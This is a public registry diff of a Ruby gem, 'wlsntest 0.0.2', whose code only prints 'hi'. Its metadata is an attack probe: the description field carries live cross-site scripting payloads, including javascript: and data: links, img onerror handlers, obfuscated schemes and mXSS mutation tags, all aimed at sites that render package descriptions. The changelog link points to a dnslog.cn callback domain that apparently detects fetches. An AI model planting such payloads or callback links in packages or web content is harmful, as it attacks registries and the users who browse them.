wlsntest 0.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of wlsntest might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/wlsntest.rb +1 -0
  3. metadata +53 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 3730f9b22a5451e440ad2907ab1d1511f818d71b5dd002b15309633b3f2a8b90
4
+ data.tar.gz: eb80fc30e10a5be36eeadee4fc36a732128dbd42b75e49e699a0de3b55151ee0
5
+ SHA512:
6
+ metadata.gz: 76c861a1c8adf5fae636d1b17538ec9954b459179d37bb248638b5b5548eeb0cf944d32fc22ea8af4877669cef28502529805a1731f22b10f769b9bf6bb65828
7
+ data.tar.gz: 4b3d9ad3270a54406e3107f923dd706cd6986c020b20ea43a96708d6e5f27f78a48d3f2b51beb040c6a829d8437d7187c213f32d87c5baece7e1a45c7695481a
data/lib/wlsntest.rb ADDED
@@ -0,0 +1 @@
1
+ puts 'hi'
metadata ADDED
@@ -0,0 +1,53 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: wlsntest
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.2
5
+ platform: ruby
6
+ authors:
7
+ - W Test
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2026-08-23 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: XSS-PROBE-START [link1](javascript:alert(document.domain)) [link2](data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg)
14
+ <img src=x onerror=alert(2)> <a href='javascript:alert(3)'>a3</a> [link4](jAvAsCrIpT:alert(4))
15
+ [link5](javascript:/*-c*/alert(5)) <math><mtext><table><mglyph><style><img src=x
16
+ onerror=alert(6)> <form><math><mtext></form><form><mglyph><style><img src onerror=alert(7)>
17
+ XSS-PROBE-END
18
+ email:
19
+ - wilson9x1@qq.com
20
+ executables: []
21
+ extensions: []
22
+ extra_rdoc_files: []
23
+ files:
24
+ - lib/wlsntest.rb
25
+ homepage: https://example.org/hp
26
+ licenses: []
27
+ metadata:
28
+ source_code_uri: https://example.org/src
29
+ bug_tracker_uri: https://example.org/bugs
30
+ documentation_uri: https://example.org/docs
31
+ changelog_uri: https://g0zizv.dnslog.cn/md-changelog
32
+ homepage_uri: https://example.org/
33
+ wiki_uri: https://example.org/wiki
34
+ post_install_message:
35
+ rdoc_options: []
36
+ require_paths:
37
+ - lib
38
+ required_ruby_version: !ruby/object:Gem::Requirement
39
+ requirements:
40
+ - - ">="
41
+ - !ruby/object:Gem::Version
42
+ version: '0'
43
+ required_rubygems_version: !ruby/object:Gem::Requirement
44
+ requirements:
45
+ - - ">="
46
+ - !ruby/object:Gem::Version
47
+ version: '0'
48
+ requirements: []
49
+ rubygems_version: 3.3.5
50
+ signing_key:
51
+ specification_version: 4
52
+ summary: security test gem xss probe
53
+ test_files: []